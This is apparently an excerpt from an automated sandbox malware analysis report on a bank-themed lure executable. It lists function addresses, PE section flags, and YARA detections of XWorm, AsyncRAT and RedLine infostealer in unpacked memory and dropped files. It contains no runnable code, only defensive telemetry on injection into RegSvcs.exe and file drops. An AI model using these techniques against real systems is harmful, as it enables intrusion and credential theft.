Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0041A4BE 9_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00418244 9_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00401650 9_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00402F20 9_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004193C4 9_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00418788 9_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00402F89 9_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00402B90 9_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004073A0 9_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_02860FE0 9_2_02860FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_02861030 9_2_02861030
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 10_2_017DDC74 10_2_017DDC74
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 10_2_057EEE58 10_2_057EEE58
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 10_2_057E8850 10_2_057E8850
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 10_2_057E0040 10_2_057E0040
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 10_2_057E0007 10_2_057E0007
Source: C:\Users\user\AppData\Local\Temp\build.exe Code function: 10_2_057E8840 10_2_057E8840
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 12_2_0099CA20 12_2_0099CA20
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 12_2_0099AA63 12_2_0099AA63
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 12_2_00998789 12_2_00998789
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 12_2_009BA810 12_2_009BA810
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 12_2_009979F0 12_2_009979F0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 12_2_009B92A0 12_2_009B92A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 12_2_009B93B0 12_2_009B93B0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 12_2_00997C00 12_2_00997C00
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 12_2_009C2D40 12_2_009C2D40
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Code function: 12_2_009BEEB0 12_2_009BEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 13_2_00CD7C00 13_2_00CD7C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 13_2_00CFA810 13_2_00CFA810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 13_2_00CD79F0 13_2_00CD79F0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 13_2_00D02D40 13_2_00D02D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 13_2_00CF92A0 13_2_00CF92A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 13_2_00CFEEB0 13_2_00CFEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Code function: 13_2_00CF93B0 13_2_00CF93B0
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_00AFC668 17_2_00AFC668
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_0340515C 17_2_0340515C
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_033C6EAF 17_2_033C6EAF
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_033F5980 17_2_033F5980
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_033C51EE 17_2_033C51EE
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_034039A3 17_2_034039A3
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_033C7F80 17_2_033C7F80
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_033F3780 17_2_033F3780
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_033FC7F0 17_2_033FC7F0
Source: C:\Users\user\AppData\Local\differences\niellist.exe Code function: 17_2_033FD580 17_2_033FD580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 19_2_02CC1385 19_2_02CC1385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 19_2_02CC1315 19_2_02CC1315
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 19_2_02CC1335 19_2_02CC1335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 19_2_02CC1021 19_2_02CC1021
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 19_2_02CC1030 19_2_02CC1030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 19_2_05A305E8 19_2_05A305E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 19_2_05A305F8 19_2_05A305F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_00007FFC3C8130E9 21_2_00007FFC3C8130E9
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Load Driver
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Security
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: String function: 00428900 appears 41 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe Code function: String function: 00420AE3 appears 70 times
Source: chrmstp.exe.2.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: chrmstp.exe.2.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe.2.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe.2.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: updater.exe.2.dr Static PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
Source: Acrobat.exe.2.dr Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.2.dr Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: SingleClientServicesUpdater.exe0.2.dr Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4
Source: notification_helper.exe.2.dr Static PE information: Number of sections : 11 > 10
Source: msedgewebview2.exe.2.dr Static PE information: Number of sections : 14 > 10
Source: msedge_pwa_launcher.exe.2.dr Static PE information: Number of sections : 13 > 10
Source: identity_helper.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: elevated_tracing_service.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: pwahelper.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.2.dr Static PE information: Number of sections : 11 > 10
Source: chrmstp.exe.2.dr Static PE information: Number of sections : 14 > 10
Source: notification_click_helper.exe.2.dr Static PE information: Number of sections : 13 > 10
Source: setup.exe0.2.dr Static PE information: Number of sections : 13 > 10
Source: firefox.exe.2.dr Static PE information: Number of sections : 11 > 10
Source: chrome_pwa_launcher.exe.2.dr Static PE information: Number of sections : 11 > 10
Source: os_update_handler.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: setup.exe.2.dr Static PE information: Number of sections : 14 > 10
Source: elevation_service.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1257862399.0000000003F40000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameALG.exej% vs Ziraat_Bankasi_Swift-Messaji_Notifications.exe
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1253495338.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamearmsvc.exeN vs Ziraat_Bankasi_Swift-Messaji_Notifications.exe
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.niellist.exe.4000000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.niellist.exe.4d10000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 00000009.00000002.1304482234.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.1415424973.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.1302912222.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: niellist.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevated_tracing_service.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: os_update_handler.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: crashreporter.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
